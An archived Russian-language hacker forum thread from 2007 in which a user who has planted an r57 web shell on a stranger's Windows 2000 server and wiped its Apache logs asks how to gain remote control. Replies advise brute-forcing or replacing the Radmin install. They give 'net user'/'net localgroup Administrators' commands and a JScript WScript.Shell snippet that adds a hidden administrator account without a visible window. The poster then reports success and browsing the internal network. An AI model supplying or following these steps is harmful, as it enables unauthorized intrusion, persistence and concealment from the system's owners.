Просмотр полной версии : Shell на Windows сервере
cyber$nake
02.10.2007, 20:45
Всем здрасте!
Ситуация следующая: Залил web-shell на веб-сервер. ОС сервера - Windows 2000 server. Полазив по серверу нашел установленный radmin 2.1 . Попробовав законнектиться радмином к этому серваку появилось окно ввода (логин, пароль).
----------------------------------------------------------
Соединение с host
Версия сервера 2.1
Соединение с host
Аутентификация Windows: Использование имени
пользователя/пароля/домена текущего пользователя
----------------------------------------------------------
Вопрос: можно ли какнить узнать пасс (кроме того как спросить у админа). Или посоветуйте, что можно еще поставить для удаленного управления.
Всем за ранее спасибо.
Лови: http://forum.antichat.ru/thread13658.html
Информативно.
Должно помочь в решении твоей проблемы.
Если есть права на запись, то сноси сервер радмина, который установлен там, и ставь свой, ну т.е. настроеный на твоем компе, с паролем который ты знаешь :) Если нет прав на запись, то только брут наверн, или может есть таки приватный bypass.
cyber$nake
03.10.2007, 06:03
Если есть права на запись, то сноси сервер радмина, который установлен там, и ставь свой, ну т.е. настроеный на твоем компе, с паролем который ты знаешь :) Если нет прав на запись, то только брут наверн, или может есть таки приватный bypass.
самое главное, что права админские, потому, что я логи апатча почистил и все нормально сохранилось.
и если я снесу радмин который стоит на ентом серваке, меня сразу спалят.
aka PSIH
03.10.2007, 07:39
создай нового юзера, и зайди через Удален.Раб.Стол под ним...
cyber$nake
03.10.2007, 07:54
создай нового юзера, и зайди через Radmin под ним...
спасибо за советы, теперь подскажите как мне создать юзера, если я нахожусь на сервере с помощью шела (r57shell) ?
aka PSIH
03.10.2007, 08:01
можно у себя на компе создать .bat файл, потом загрузить его на сервер и запустить,
можно просто через cmd на сервере:
net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
cyber$nake
03.10.2007, 08:26
можно у себя на компе создать .bat файл, потом загрузить его на сервер и запустить,
Сообщение от aka PSIH
А терь попробуй это рподелать с правами гостя ))))))))))))))))) ыыы посмотрю я на твою рожу)))
это всё тогда уж пихаем в bat и в автозагрузку, тока вот проблема, адмен заметит твоё черное окошко, выход из ситуации ищи сам, ибо не позорь священое имя снейка. -)
f1rebl00d
03.10.2007, 17:01
Эти действия можа сделать и через JavaScript или VBScript, при етом окошко не будет! что нам и надо.
cyber$nake
03.10.2007, 17:35
Эти действия можа сделать и через JavaScript или VBScript, при етом окошко не будет! что нам и надо.
поподробнее пжалста!
f1rebl00d
03.10.2007, 17:55
Самый простой способ, создай файл с расширением JS
Вот код:
var Myshell = WScript.CreateObject("WScript.Shell") // Объект Shell
Myshell.Run("net user <user> <pass> /add", 0)
Myshell.Run("net localgroup Administrators <user> /add", 0)
aka PSIH
04.10.2007, 06:07
А терь попробуй это рподелать с правами гостя ))))))))))))))))) ыыы посмотрю я на твою рожу)))
Ты возможно слепой но ТС писал:
самое главное, что права админские
это всё тогда уж пихаем в bat и в автозагрузку, тока вот проблема, адмен заметит твоё черное окошко, выход из ситуации ищи сам, ибо не позорь священое имя снейка. -)
Далеко не факт что админ за сервером 24 часа в сутки, можно найти время когда он не заметит как окошко вылезит на 2 секунды...
cyber$nake
04.10.2007, 09:25
всем большое спасибо за помощь, все получилось, даже по внутренней сетке полазил, но ни чего интересного не нашел.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot